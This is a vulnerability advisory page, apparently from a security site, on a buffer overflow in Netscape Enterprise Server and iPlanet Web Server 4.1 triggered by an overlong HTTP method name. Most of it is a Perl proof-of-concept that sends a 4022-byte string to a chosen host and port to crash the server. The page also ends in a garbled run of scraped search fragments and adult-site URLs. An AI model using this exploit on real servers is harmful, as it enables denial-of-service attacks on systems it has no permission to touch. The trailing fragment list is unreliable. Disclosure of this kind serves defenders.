about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Netscape Enterprise Server HTTP Method Name Buffer Overflow Vulnerability


Title Netscape Enterprise Server HTTP Method Name Buffer Overflow Vulnerability
Published 2001-05-19-12:00AM
Updated 2003-02-07-12:10AM
Class Boundary Condition Error
CVE   CAN-2001-0747
Remote  Yes
Local  No
Credit  Discovery of this vulnerability has been credited to: Robert Cardona <dasquid@digizen-security.com>
Vulnerable  Netscape Enterprise Server 4.1 SP7
Netscape Enterprise Server 4.1 SP6
Netscape Enterprise Server 4.1 SP5
Netscape Enterprise Server 4.1 SP4
Netscape Enterprise Server 4.1 SP3
iPlanet Web Server 4.1 SP7
iPlanet Web Server 4.1 SP6
iPlanet Web Server 4.1 SP5
iPlanet Web Server 4.1 SP4
iPlanet Web Server 4.1 SP3
Not Vulnerable  Netscape Enterprise Server 4.1 SP8
Code   The following proof of concept code was supplied by Robert Cardona <dasquid@digizen-security.com>:

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host port ";
exit;
}
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $! ";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0 ";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_ ";
}
close $sock;
}
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:40:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ESMTP 6.0 029xy.com www.donk p Pictures. Www.srayas goldmine Www.purevo asin u tub 195.144.11 www.xgwxkj www.world /search/ex www.goooai 24gens maxcpm.inf mallusexyg Sanka win xp sp2 Linux Ker sexy phto guestbook. cosex.net photo.sina japan.com ocensex.co priston ta securtey s php-nuke 2 200 /compo ir3x www.trish news for c maxcpm.inf WWW.TAMILS 200 /compo www.under GET /u Www.world Tamil acte www%2Bsex1 prosuppor dropbear 4 mambo Remo Teensexpia /search/ex www tamil www.123 cl nice video w xnxx com 365